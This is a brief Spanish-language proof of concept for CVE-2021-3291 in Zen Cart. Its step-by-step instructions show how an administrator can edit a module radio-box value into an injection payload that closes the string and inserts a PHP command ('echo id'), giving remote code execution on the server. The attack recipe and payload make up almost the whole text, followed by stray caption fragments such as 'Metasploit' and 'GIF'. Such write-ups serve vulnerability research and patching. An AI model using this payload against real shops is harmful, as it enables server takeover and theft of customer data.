
Exploit de ejecución remota de código autenticada para Zen Cart mediante inyección SQL en la edición de módulos de administración. Prueba de concepto para CVE-2021-3291.
1-) iniciar sesión como administrador
2-) ir a la página de edición de cualquier módulo
3-) inspeccionar el elemento de cualquier radiobox con valor true
4-) cambiar true a true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo id; //
5-) hacer clic en actualizar
6-) para ejecutar el comando, ve de nuevo a la página de edición
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
explotando
refrescar página
zoom

Metasploit

GIF
